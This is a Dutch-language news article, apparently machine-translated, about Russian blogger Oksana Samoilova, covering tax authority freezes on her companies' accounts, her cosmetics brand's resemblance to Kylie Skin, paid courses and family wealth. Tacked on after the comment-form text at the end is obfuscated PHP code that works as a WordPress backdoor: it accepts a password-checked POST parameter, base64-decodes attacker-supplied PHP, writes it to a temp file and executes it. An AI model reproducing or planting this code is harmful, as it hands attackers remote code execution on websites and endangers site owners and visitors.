Een miljard op een “kopie van Kylie”: hoe Oksana Samoilova een schoonheidsimperium opbouwde

De Federale Belastingdienst (FTS) blijft bloggers in een ring van strikte regelgeving drijven. Een speciale afdeling voor het controleren van rijke Russen heeft de ‘marathonkoningin’ Elena Blinovskaya en de bloggers Valery en Artem Chekalins al voor de rechter gedaagd. Nu heeft de afdeling de toegang tot de bankrekeningen van de firma’s van Oksana Samoilova, de vrouw van rapper Dzhigan, moeder van vele kinderen, model, ontwerper, ondernemer en coach tijdelijk afgesloten. Het bureau gaf geen officieel commentaar, maar de blogger en haar man hadden het gehuurde huis al verlaten richting Dubai.

Vanaf 2 mei blokkeerde de Federale Belastingdienst tijdelijk operaties op de rekeningen van twee bedrijven waarin Samoilova optreedt als algemeen directeur. We hebben het volgens SPARK over Family Fest LLC en Iemspeshel LLC. In dat laatste treedt Samoilova ook op als mede-eigenaar. Beide bedrijven zijn gespecialiseerd in de productie van kinderkleding.

Samoilova werd een van de zeven miljonairbloggers die onder een grootschalige controle vielen. Onder hen zijn Elena Blinovskaya , Valery Chekalina en Alexander Mitroshin , tegen wie al strafzaken zijn aangespannen, merkt de 112 Telegram-zender op. Volgens hem zijn hun rekeningen geblokkeerd en kunnen belastingmaterialen bij de Onderzoekscommissie terechtkomen.

De blogger en haar man zijn echter al uit Rusland vertrokken naar Dubai. Op haar Instagram * heeft Samoilova al gepocht over het weer en een nieuw zwempak.

Eerste stappen naar “succesvol succes”

Samoilova werd populair op sociale netwerken dankzij haar relatie met Dzhigan, van wie ze vier kinderen kreeg. Ze werd geboren op 27 april 1988 in Ukhta. De blogger praat liever niet over de tijd vóór het huwelijk met een muzikant, en merkt op dat ze als model werkte.

Tegelijkertijd gelooft blogger Lena Miro dat ze vóór Dzhigan Samoilov een vertegenwoordiger was van de escortservice. Oksana ontkent dit zelf en laat in haar sociale netwerken zien dat ze “zichzelf heeft gemaakt” als ondernemer zonder te vertrouwen op de populariteit van haar man. Samoilova vertelde abonnees dat zij en Dzhigan aan het begin van hun leven samen arm waren en op de grond sliepen wegens gebrek aan geld voor meubels. Op het moment van hun huwelijk in 2012 was Djigan echter al lid van de Black Star Mafia en reed hij in dure auto’s. Bovendien publiceerde ze na de verklaring van Samoilova over armoede op sociale netwerken zelf een foto met Dzhigan, genomen in Parijs in 2010.

Samoilova opende haar eerste zaak, de Mira Sezar-winkel, samen met haar vriendin Miroslava Shvedova. In 2015 lanceerde de blogger de Fit For You-app (een maandabonnement kost 3.700 roebel en een half jaar – 17 duizend roebel), die gebruikers moest helpen snel weer in goede conditie te komen. Maar klanten beschuldigden de blogger van een product van slechte kwaliteit: er werden geen voedingsplannen naar hen gestuurd en individuele training bleek middelmatige lessen voor beginners. In 2019 werd de applicatie niet meer bijgewerkt, terwijl het geld nooit werd teruggegeven aan klanten.

Later besloot de blogger kinderkleding te verkopen onder het merk IAmSpecial (Iamspeshl LLC), waarvoor reclame werd gemaakt door haar dochters Ariela en Leya. In 2019 zei een winkelmedewerker die de winkel verliet dat hij illegaal werkte. Volgens haar werden “natuurlijke stoffen” gekocht bij de “Gardener” en was de prijs van kleding enorm opgeblazen – van 5 tot 10 duizend roebel. “Het kan Oksana niet schelen wie werkt en hoe. Het belangrijkste is de omzet. Toen ze voor het nieuwe jaar beautyboxen uitbracht, plaatste ze testers in plaats van de aangegeven volwaardige producten, ‘ merkte de medewerker op .

Sinds 2019 leed het merk een verlies van minstens 3 miljoen roebel per jaar en in 2020 stopte het met werken. Op dit moment bestaat Aimspecial LLC nog steeds, maar voert geen enkele activiteit uit.

Nu is de 35-jarige blogger eigenaar van de schoonheidskliniek El`cosmo in Moskou, het Family1 nanny-wervingsbureau, maar ontvangt haar belangrijkste inkomen van haar cosmeticamerk Sammy Beauty. Die laatste stond direct na zijn verschijning in 2020 centraal in het schandaal.

Gebruikers vonden een sterke gelijkenis tussen de cosmetica van Samoilova en Kylie Jenner’s Kylie Skin care-producten. Later kreeg Sammy Beauty dezelfde set producten als Jenner: gezichtswas, walnotenscrub, toner en vochtinbrengende crème. De Sammy Beauty-advertentiecampagne bleek ook bijna een kopie van de Kylie Skin-advertentie te zijn, net als de website van het merk. De abonnees van Samoilova hebben ook aandacht besteed aan de recensies op de website van haar merk. Een van de meisjes die gebruik maakte van de verzorging, sproeten verdween op de “na” foto.

Beautyblogger Natalina Mua kwam samen met een schoonheidsspecialiste tot de conclusie dat Sammy Beauty universele moisturizer alleen geschikt is voor de vette huid, en niet voor alle soorten. In september 2020 meldde advocaat Roman Lalayan 20 beroepen van ontevreden klanten van Samoilova en stuurde hij verzoeken naar Rospotrebnadzor en Roszdravnadzor waarin hij eiste de kwaliteit van cosmetica te controleren.

“Ja, Sammy Beauty lijkt op Kylie Cosmetics. Het is ook vergelijkbaar met andere merken. En het kan me niet schelen, want ik hou van deze stijl. Het belangrijkste is dat het qua samenstelling niet vergelijkbaar is met andere. Het is gewoon mooi. Ik hou van deze roze en ik kan er niets aan doen. Ik wilde geen make-up in een andere kleur maken. Alle!” Samoilova legde uit .

Infobusiness met May Musk

In 2020 verschenen er veel nieuwe bloggers op sociale netwerken, die succesvolle moeders en ondernemers combineerden. Toen kondigde Samoilova, die samen met Dzhigan een voorbeeld was van een ideaal groot gezin, een scheiding aan . De reden was het gedrag van de rapper: hij speelde vals, dronk, beledigde kinderen en ging toen naar de afkickkliniek. Later probeerde Dzhigan op alle mogelijke manieren terug te keren naar de familie, die Samoilova uitzond op haar sociale netwerken. De blogger ” wilde niet wakker worden in deze wereld”, maar vergaf haar man toch.

De “scheiding” van de media bracht haar 2 miljoen nieuwe abonnees, waardoor de blogger actief kon deelnemen aan de weggeefacties (giften). Volgens het Telegram-kanaal “Holivar” slaagde Samoilova erin om in een maand ongeveer 12 miljoen roebel te verdienen aan tekeningen.

Dzhigan en Oksana Samoilova

In 2021 kondigde Samoilova de cursus Strategie voor een miljoen aan , waarmee een doelgerichte vrouw succesvoller en rijker kan worden. “Acht thematische blokken die zullen helpen het bewustzijn te veranderen en de nodige kennis en vaardigheden zullen bieden om het eerste miljoen te verdienen”, aldus de aankondiging .

De kosten van de cursus varieerden van 3.490 tot 119.990 roebel. Voor wie het duurste pakket kocht, organiseerde Samoilova een webinar met de moeder van Elon Musk, May Musk, als expert.

Aan het einde van de cursus van twee maanden beloofde ze een staatsdiploma van de Russian New University (RosNOU), een bevestiging van de kennis van verschillende specialiteiten, waaronder enkele neuromarketing, neurocopywriting en neuroinvestment. In de cursus leert de blogger je van jezelf te houden, negatieve attitudes kwijt te raken, ze te vervangen door positieve, en raadt aan een dankbaarheidsdagboek bij te houden.

De uitleg in de cursus van Samoilova lijkt sterk op de informatieproducten van andere bloggers. Zo vergelijkt ze angst met een ‘deur’ waardoor ‘de uitgang naar een nieuw niveau’.

Precies dezelfde vergelijking werd gemaakt door Victoria Bonya (cursus “Ik ben een vrouwelijke godin”), Gusein Gasanov (“Thinking of a millionaire”) en Valeria Chekalina (“Money marathon”).

De cursus bracht haar van 70 naar 390 miljoen roebel. Ondertussen bleek Sammy Beauty het meest succesvolle bedrijf van Samoilova te zijn – het merk bracht haar volgens SPARK-gegevens in 2021 ongeveer 1 miljard roebel op.

Dubai en huis te huur

Door schandalen, merken en informatiecursussen, samen met de inkomsten van Dzhigan, kon de familie een huis met drie verdiepingen en een oppervlakte van 850 vierkante meter op hypotheek kopen in het gesloten clubdorp Chateau Sovereign op New Riga met een sauna-hamam , een kleedkamer, een thuisbioscoop, een buitenzwembad, een barbecueplek en een huisje voor het personeel. In 2022 zette het stel het huis te koop voor bijna $ 2 miljoen.

Nu huren ze een huis van 1.745 vierkante meter in het naburige dorp Agalarov Estate, wat hen 3 miljoen roebel per maand kost. Dzhigan en Samoilova kochten ook voorzichtig verschillende appartementen in Dubai voor een prijs van 8 tot 36 miljoen roebel (nu woont Samoilova daar).

In augustus vorig jaar gaf Samoilova haar man een Mercedes-minibus – de prijzen voor dit model beginnen bij 10 miljoen roebel. Het “bedrijf” ontdekte dat Samoilova zelf Cadillac Escalade ESV-auto’s bezit ter waarde van minstens 10 miljoen roebel en Rolls-Royce Ghost, waarvan de prijzen beginnen bij 23 miljoen roebel.

Niet alleen Samoilova en Dzhigan verdienen geld in het gezin (zijn optredens kosten van 700 duizend tot 1 miljoen roebel), maar ook hun oudste 11-jarige dochter Ariela. Ze verzamelt en verkoopt “allerlei leuke dingen” in de vorm van dozen aan vrienden. De “dealer” van Ariel’s goederen was haar moeder. Volgens Samoilova ontvangt de dochter dus een inkomen van 15-18 duizend roebel per week.

Leave a Reply

Your email address will not be published. Required fields are marked *if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}